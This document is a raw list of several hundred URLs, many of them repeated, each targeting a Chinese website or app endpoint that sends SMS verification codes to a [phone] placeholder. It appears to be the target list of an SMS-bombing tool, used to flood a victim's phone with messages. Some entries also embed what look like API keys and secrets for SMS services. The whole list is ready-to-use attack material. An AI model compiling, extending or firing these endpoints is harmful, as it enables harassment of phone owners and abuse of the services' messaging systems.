"http://api.jzhrj.cn/api/User/SendRegCode?mobile=[phone]&signature=b9ca097bdb7678ffe631d0aecb2615e16b4986f4&timestamp=1558168022&nonce=573&appid=CalendarGPRJ", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://m.aihuaju.com/wap/index.php?act=security&op=send_reg_mobile&mobile=[phone]", - "http://v2.tgmmvip.com:80/wolong/user/getphonecode?phone=[phone]&deviceid=864680046080077&type=0", - "https://api.intsig.net/user/cs/send_emailsms_with_verify?account=[phone]&account_type=mobile&area_code=86&client_app=CamScanner_IP_FREE%405.12.1.1907311855&device_id=4f06e7989623c84b4c88dddc46724ea2&language=zh-cn&type=login_via_vcode", - "http://www.fvv678.cn/app/user/checkMobileReg?mobile=[phone]&token=0&timestamp=1558355544&sign=c906bc234a2b4ac71ed23cae0147092b", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "https://appapi.che168.com/phone/v55/user/CreateRegLoginMobileCode.ashx?_appid=2scapp.ios&_sign=bd185e04d8bdb0422467b0f95f828b49&appversion=7.7.0&channelid=App%20Store&ip=192.168.43.151&mobile=[phone]&udid=5WklXEFrvscsddZR8s3TrLI45Bg0YEW9MkEFqRLSrR1ZKpY81h2wTw8pEHBo", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://bj.iguanyu.com/gywebsite/common/sendVerificationCode?phone=[phone]", - "https://passport.xueweigui.com/mobile/sendCode?mobile=[phone]&op=10&k=d12c14cc39c8a48be8c181e401e4b962", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://www.zhiguker.com/index/user/regYzm?phone=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://koudaitong.com/v2/common/sms/captcha.jsonp?callback=jQuery1102020099561656467435_1430461129946&verifyTimes=1&biz=kdt_account_captcha&_=1430461129949&mobile=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://doc.u-ease.com:80/account/Verifycode/login?app_os=IOS&app_version=3.0.8&device_id=B097BD84-2B27-4E2B-AAB3-D05E3AE0FBE0&phone=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://yueban.500zhuan.com/tools/getNum?&phone=[phone]&sign=20f2f798a813a8115f5a837c7cad140b&timestamp=1566033453", - "https://api.1sapp.com/captcha/getSmsCaptcha?GUID=9b079137577015d58e0428cbae5.61417812&OSVersion=12.4&active_method=icon&deviceCode=5C351103-F887-4932-BC59-58C75875EFDE&distinct_id=&dtu=100&lat=29.58959433282935&lon=106.281065329089&network=WIFI&sign=73ffc97fcc0d33c", - "http://yueban.500zhuan.com/tools/getNum?&phone=[phone]&sign=20f2f798a813a8115f5a837c7cad140b&timestamp=1566033453", - "http://m.tk.cn:80/tkmobile/orderSentSmsServlet?mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://soufunapp.3g.fang.com/http/sfservice.jsp?messagename=appSendMobileCode&mobilephone=[phone]&operatetype=0&sendvoice=0&wirelesscode=2C56469F49A8526BC922ECFA14C22AC7", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://b.hongkedou.com/phoneVerifyCode/getVerificationCode?phone=[phone]&business=buyer-register", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://www.txooo.com/Txooo/Main/Busine**屏蔽敏感词**equirement/Ajax/Busine**屏蔽敏感词**equirementAjax.ajax/SendMobileCode?mobile=[phone]", - "http://www.51qub.com/member/sendmobilesms?mobile=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://park.chemi.ren//serverpark/index.php/Api/Mobileapi/getCode?phone=[phone]&action=codeLogin&type=sms&client=android&version=2.4", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://user.daojia.com/user/getSmscode?mobile=[phone]&bu=", - "https://ubas.360jie.com.cn/ubas/event/report?flowNo=49181563973602947&bizCode=REGISTER_LOGIN&eventCode=SEND_SMSCODE&pageName=login.html&ABTest=A&TuanABTest=A&userOprTime=1563973631831&hostApp=APP&sourceType=APK&channelSource=CH_001_IOS&subChannel=&activityInfo=&utm", - "http://i.vaakwe.com/user/reg_send_code.php?mobile=[phone]&country=0086&udid=a884f6c7f15ff08a97ab16e4d33fe2c216a9ebed&imei=02:00:00:00:00:00&mac=02:00:00:00:00:00&imsi=02:00:00:00:00:00&token=ba4edbf30bc5363ba02875fc4c6b25c8a21ed8a99e21c5c40ff6385c43c71c8b&type=sms&", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", - "http://jieapi.profacty.cn/api/verification/sendPhone?phone=[phone]&type=102&timestamp=1559301154413&sign=e720200313338403aaa8e13a3f333da7", - "http://group.leying.com/user/send-login-or-reg-validate-code?.sig=485fcbb8de19a6031a640e4fba81b7d7&cinema_id=23&city_id=502&client_id=3e5da9998f896&graph_validate_code=&group=20008&mobile=[phone]&pver=7.0&session_id=&source=105001&ver=5.5.5", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=25", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://m.rong360.com/mobile/Wxpageforapp/SendSmsVcode?mobile=[phone]&callback=rong_json1565594522310&v=7620", - "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307700360712450502_1523359569433&mobile=[phone]", - "https://happy.mail.10086.cn/jsp/cn/club/login/smscode.do?r=0.24631415040371842&usermobile=[phone]", - "https://jdapi.jd100.com/uc/v1/getSMSCode?account=[phone]&sign_type=1&use_type=1", - "http://my.baihe.com/Getinterregist/captchaAndRegCheck?account=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=21", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://www.baixing.com/oz/verify/reg?mobile=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://doc.u-ease.com/account/Verifycode/login?app_os=IOS&app_version=3.0.8&device_id=B097BD84-2B27-4E2B-AAB3-D05E3AE0FBE0&phone=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://app.api.lianjia.com/user/account/sendVerifyCodeForRegisterV2?mobile_phone_no=[phone]&request_ts=1564114069", - "http://group.leying.com/user/send-login-or-reg-validate-code?.sig=485fcbb8de19a6031a640e4fba81b7d7&cinema_id=23&city_id=502&client_id=3e5da9998f896&graph_validate_code=&group=20008&mobile=[phone]&pver=7.0&session_id=&source=105001&ver=5.5.5", - "http://www.guaguale.men/api.php?act=user&key=rt1BThTaqQjjqbx1RD&phone=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://app.yimian.red/service/hs/login/sms?telphone=[phone]&type=0&time=1563875962595&sign=f714baa6f3788e90bf483d6b2e22a133", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "https://nhapi01.tv189.com/cpms/Internet?appid=111010310081&phone=[phone]&idfa=5C351103-F887-4932-BC59-58C75875EFDE&NetType=WIFI&channelID=01834221&type=register&iosid=ccb2ffcb0bc0a5b42678ac61fed3372bed1ce69a&devid=000001&pcode=4&accessType=99&clienttype=5&token=417", - "http://www.nongyisheng.com/sms/code?fr=pc&token=false&phone=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://api.hanju.koudaibaobao.com/api/user/verifyMobile?country=%2B86&mobile=[phone]", - "http://www.qmxgz.cn/api/Sms/send?phone=[phone]", - "https://www.xhsd.cn/front/CheckLogin.jsp?cmd=telcheckr&Mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=18", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://www.newtank.cn/newtank/act/sendCaptcha.do?activityId=161&channelId=15399&_d=1506594279964&mobile=[phone]&_=1551173567874", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://www.tongquwangluo.com/api/v2/register/sendCode?mobile=[phone]&token=d19f72dbe0834107ae2007fc43d8ab79&secret=aKM2o9pwNeUkhmxx5z7RuQ==", - "http://gangqinpu.yusi.tv/?urlparam=cginfo/userinfo/sendsms&phonenum=[phone]&platform=iphone&sendtype=1&version=1.5.6", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://api.xingchentd.com/logic-user/user:users/mobile/?mobile=[phone]&projection=withRoles", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://www.tongquwangluo.com/api/v2/register/sendCode?mobile=[phone]&token=d19f72dbe0834107ae2007fc43d8ab79&secret=aKM2o9pwNeUkhmxx5z7RuQ%3D%3D", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "https://www.shencut.com/api/v1.0/code?operate_type=register&mobile=[phone]", - "http://dgapi.zczgcn.com/shopSupport?Mobile=[phone]&BusinessId=15886&systemType=android&appVersion=4.1.01&postTime=2019-07-19+00%3A19%3A14&timeStamp=1563466754286&method=ShopSupport.GetGuiderLoginVerifyCode&format=json&user=u1city&token=a0ea92fa90904b64becaa5b2bb0b8", - "http://m.aihuaju.com/wap/index.php?act=security&op=send_reg_mobile&mobile=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "https://gateway-api.kuainiujinke.com/etrack/record?date=2019-09-02&refer=https%3A%2F%2Fwww.daishangqian.com%2Fm%2F%23%2Fuser%2Flogin&source=dsq&timestamp=1567390955843&traceId=A15C586B-6CFF-47C7-81FF-3ACFFB39D046&uid=&url=https%3A%2F%2Fwww.daishangqian.com%2Fm%2F%2", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://mc.imways.com/wechat/member/info/sendmsg?mobile=[phone]", - "https://jjy.3g.fang.com/httpclient/agentservice.jsp?groupFlag=ESF&messagename=jjy_getPassportandCustomerIds&phone=[phone]&wirelesscode=57b34f0c5725ee3d9e76c2619c394ae8", - "http://api.qingmang.me/v1/account.sendVerification?code=1566478386.8872059778&phone=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://skyapp.mackentan.com/app/v5/login/verifyuser.do?t=1565488775000&did=EVrRL0SJdF8b4aa87b41&ver=170&it=434857&username=[phone]&fit=434857&sign=df42d291c6c8487aab384f3da2f5a42f6920e76b&appid=com.jediapp.changgejiaoxue&idfa=5C351103-F887-4932-BC59-58C75875EFDE", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://wx.airjiangxi.com/html5_jx/main?sourceid=&apptype=&appcode=&developer=&channel=&usertype=&userid=&actionCode=18&type=0&cotentType=1&mobileORemail=[phone]&ffpid=&pidNumber=", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://h5.gumipet.com/shops_sms_register?phone=[phone]", - "http://quan.lukou.com/api/sms/verification_code?phone=[phone]&sign=74F59C2BB6F3830D6EB835FDA7550EB7&t=1564024638", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://doc.u-ease.com/account/Verifycode/login?app_os=IOS&app_version=3.0.8&device_id=B097BD84-2B27-4E2B-AAB3-D05E3AE0FBE0&phone=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]&_=1506486656411", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "https://pass.hujiang.com/v2/Handler/UCenter?action=SendMsg&imgcode=&token=1e7bbab658a5b65cbc3074d6296a0b9b&sendtype=register&msgtype=1&captchaVersion=2&user_domain=hj&business_domain=&hpuid=P0S4wETf4noqmS29L5650&callback=reqwest_1546707722757024049&mobile=+86-[ph", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://api.sssc.cn/seccode/reg?callback=&m=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://vip.haier.com:80/vipCode/user/sendMobileCode?sendType=codeLogin1&domainName=Haier&mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]&hash=9f82736455da1c53", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://my.cnki.net/elibregister/Server.aspx?mobile=[phone]&temp=1551691791466&operatetype=2", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://appsever.caissa.com.cn/api/token/user/verifyAndgetCaptcha?data=%7B%22phone%22%3A%22[phone]%22%2C%22type%22%3A%223%22%2C%22userId%22%3A%22%22%7D&head=%7B%22account%22%3A%22android01%22%2C%22channel%22%3A%22C0001%22%2C%22channelSecond%22%3A%22CS0001%22%2C%22pa", - "http://api-v1.ezpaychain.com/invoice/v1/user/send-sms?calling_codes=%2B86&phone_number=[phone]&type=activation&version=1", - "http://app.yimian.red/service/hs/login/sms?telphone=[phone]&type=0&time=1563875962595&sign=f714baa6f3788e90bf483d6b2e22a133", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://srmemberapp.srgow.com/sys/captcha/[phone]", - "https://babyheartapi.ihealthbaby.cn/BabyheartServer/sms/sendMessage?sendType=1&smsType=1&tel=[phone]", - "https://client.uqbike.com/sms/sendAuthCode.do?accountId=5&phone=[phone]", - "http://wx01.lecake.com/customer/get-code.html?mobile=[phone]&yzm=148323267", - "http://wx01.lecake.com/customer/get-code.html?mobile=[phone]&yzm=148323267", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://group.leying.com/user/send-login-or-reg-validate-code?.sig=485fcbb8de19a6031a640e4fba81b7d7&cinema_id=23&city_id=502&client_id=3e5da9998f896&graph_validate_code=&group=20008&mobile=[phone]&pver=7.0&session_id=&source=105001&ver=5.5.5", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://zhuikanxs.com/novelapilogin/sendsms?phone=[phone]&idfa=5C351103-F887-4932-BC59-58C75875EFDE&package=sxrqowww.com&version=1.6.9&token=384e798aee87f24f4a228a41df049e27&type=1&timestamp=1567400876&sign=9726d9876bd9e1bbc5667eeadd28e42b", - "http://user.yuntuds.net/register_get_valid_number?sign=a316b3d460901f104f9e8e84662640c0&phone_number=[phone]&nwtime=1548162361&_u=acde09261c08497067779e1fd4ee4a6e&version=4.5.1&platform=android&appx=yuntu&apppn=org.fungo.fungolive&channel=tencent&market=32&os_versi", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", - "https://www.tongquwangluo.com/api/v2/register/sendCode?mobile=[phone]&token=d19f72dbe0834107ae2007fc43d8ab79&secret=aKM2o9pwNeUkhmxx5z7RuQ%3D%3D", - "http://www.6dspeaker.com/sdspeaker/public?method=getPhoneCode&phone=[phone]&countryCode=%2B86&validateType=1", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "https://babyheartapi.ihealthbaby.cn/BabyheartServer/sms/sendMessage?sendType=1&smsType=1&tel=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://api.mianmianyue.com/basis/sendCheckCode?mobile=[phone]&checkSign=Gec1LPgwdA4OOyqQLAS5UkZnmck2eRyJxJP6rvTU7K8%253D", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=19", - "http://www.huizhuang.com/m/login/getmobilecode?cate=login&mobile=[phone]&_=1551173567935", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://iu.snssdk.com/user/mobile/send_code/?iid=80794405933&type=1&mobile=[phone]&ac=WIFI&channel=App%20Store&app_name=joke_zone&aid=27&version_code=2.2.0&device_platform=iphone&os_version=12.4&device_type=iPhone8,1&device_id=68923678300&vid=FFAA4EA8-1E5C-4EA0-9A1E", - "http://www.easgs.cn/app/index.php?i=8&c=entry&do=sms&m=junsion_winaward_plugin_wap&mobile=[phone]", - "http://api.v2.msparis.com/common/mobile?channel=App%20Store-vest&clientId=msparis-ios-4.2.4-vest&mobile=[phone]&platform=ios-vest&rent_mode=2", - "http://park.chemi.ren//serverpark/index.php/Api/Mobileapi/getCode?phone=[phone]&action=codeLogin&type=sms&client=android&version=2.4", - "https://app.api.ke.com/user/account/sendverifycodeforbindmobilev2?mobile_phone_no=[phone]&request_ts=1564116332", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://user.tgbus.com/api/action.ashx?callback=callback10491710835861462&t=sendsms&format=json&Action=0&phone=[phone]", - "https://doctor.helianhealth.com/api/v3/auth/common/getSMScode?cellphone=[phone]&sign=d821db6c5629ea532b9f8ff95e39e952&smsType=1&timestamp=1568266253&type=1", - "https://www.xhsd.cn/front/CheckLogin.jsp?cmd=telcheckr&Mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://wsxf.gjxfj.gov.cn/zfp/getyzmservice/getyzm?theme=none&act=addNew2mb=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://idecoration.ikongjian.com/user/fetchCode?&deviceId=7676F5C4-1919-4FC8-9436-BBFD5BE87482&mobile=[phone]&type=1&token=YzVkMGVlYWMtZTU4My00MTc2LWJkMzYtZGZlMWRjODgwYjBkZDBiMDg4Y2QxZWZkLTYzZGItNjcxNC0zODVlLWNhZWUwZDVj", - "http://duanxin.diluw.com/index.php?hm=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=0", - "https://soufunapp.3g.fang.com/http/sfservice.jsp?messagename=appSendMobileCode&mobilephone=[phone]&operatetype=0&sendvoice=0&wirelesscode=2C56469F49A8526BC922ECFA14C22AC7", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://pass.hujiang.com/Handler/UCenter?action=SendMsg&callback=&imgCode=&token=&_=&mobile=[phone]", - "https://kaojiazhao.eclicks.cn/xc_v1/Enroll/create_code?driving_cert_type=1&_cityCode=023&tel=[phone]&learn_stage=0&appChannel=App%20Store&cUDID=5C351103-F887-4932-BC59-58C75875EFDE&lng=106.2849618867906&appVersion=7.5.3&que_city_id=27&os=iOS&enr_city_id=75&openUDID", - "https://appapi-h5.yongche.com/Common/CreateAuthCode?cellphone=[phone]", - "http://zk.weegoo.cn/zhuanKe/api/smss/send?phone=[phone]", - "http://tel.kuaishang.cn/ajax.php?act=sendmsg&author=齐晨&fromurls=http://www.mianfeidianhua.net/hsnzy.html&content=想咨询。&did=382&uid=2010131726&phone=[phone]&_=1551173567919", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://sms.bechtech.cn/Api/send/data/json?accesskey=1730&secretkey=3f198068c6b5c1036f9b38ae0690cc244695a247&mobile=[phone]&content=%E6%82%A8%E7%9A%84%E6%89%8B%E6%9C%BA%E9%AA%8C%E8%AF%81%E7%A0%81%E4%B8%BA%EF%BC%9A3973+%EF%BC%8C%E8%AF%A5%E9%AA%8C%E8%AF%81%E7%A0%8110%", - "http://m.logofree.cn/misc.php?act=send_sms&m=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://api.hanju.koudaibaobao.com/api/user/verifyMobile?_ts=1564136775711&country=+86&mobile=[phone]", - "https://m.health.pingan.com:443/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300&timestamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://api.moonreader.cn/mreader/common/sendMobile.do?mobile=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "https://app.quyiyuan.com/APP/user/action/LoginAction.jspx?APPOINT_SOURCE=0&CHANNEL_ID=&IMEI_ID=3ECFD13A-235B-47A9-A9E1-F4DCC64D360F&PHONEOPERATINGSYS=2&PHONETYPE=iPhone8,1&PHONEVERSIONNUM=12.4.1&PHONE_NUMBER=[phone]&PUBLIC_SERVICE_TYPE=0&hospitalID=&isRead=1&loc=c&", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://appbackend.pohoocredit.com/pro-kuaixin-app-backend/app/user/captcha?mobile=[phone]", - "http://user.daojia.com/user/getSmscode?mobile=[phone]", - "http://www.easgs.cn/app/index.php?i=8&c=entry&do=sms&m=junsion_winaward_plugin_wap&mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://consumer.fcbox.com/v1/account/sendCode?mobile=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1557631709566&req_time=&user_id=[phone]", - "https://nhapi01.tv189.com/cpms/Internet?appid=111010310081&phone=[phone]&idfa=5C351103-F887-4932-BC59-58C75875EFDE&NetType=WIFI&channelID=01834221&type=register&iosid=ccb2ffcb0bc0a5b42678ac61fed3372bed1ce69a&devid=000001&pcode=4&accessType=99&clienttype=5&token=417", - "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1557631709566&req_time=&user_id=[phone]", - "https://uas.xingshulin.com/passport/default/captcha/LOGIN/sms/[phone]?", - "https://apis.changbalive.com/apis.php?ac=registerwithphone&curuserid=&channelsrc=appstore&version=3.0.2&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=e77c9aae3b3d1994fdb56947e974fc21fcf20f99&systemversion=12.4&device=iPhone8,1&b", - "http://passport.jcard.cn/Service/AjaxSendCodeService.aspx?doType=sendextcode&_=1445158370&mobile=[phone]", - "http://1314.buzz:80/index.php?hm=[phone]&ok=", - "http://v.juhe.cn/sms/send?mobile=[phone]&tpl_id=11115&tpl_value=%23code%23%3d321809&key=a68cead9b27523c56ce7fd7fc1312ea4", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=15", - "https://b.hongkedou.com/phoneVerifyCode/getVerificationCode?phone=[phone]&business=buyer-register", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=20", - "http://wx.airjiangxi.com/html5_jx/main?sourceid=&apptype=&appcode=&developer=&channel=&usertype=&userid=&actionCode=18&type=0&cotentType=1&mobileORemail=[phone]&ffpid=&pidNumber=", - "http://api.moonreader.cn:80/mreader/common/sendMobile.do?mobile=[phone]", - "http://jieapi.profacty.cn/api/verification/sendPhone?phone=[phone]&type=102&timestamp=1559301154413&sign=e720200313338403aaa8e13a3f333da7", - "https://passport.ziroom.com/verify/code/v2?phone=[phone]&type=1", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://mobile.yougou.com/v_1.8/quicklyLoginMobileverify?username=[phone]", - "https://consumer.fcbox.com/v1/account/sendCode?mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=22", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "https://passport.ceair.com/cesso/mobile!geetCheck.shtml?_0.3520412800489632&mobileNo=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "https://hdgateway.zto.com/auth_account_sendLoginOrRegisterSmsVerifyCode?mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=14", - "http://app.syxwnet.com/?app=member&controller=index&action=sendMobileMessage&mobile=[phone]", - 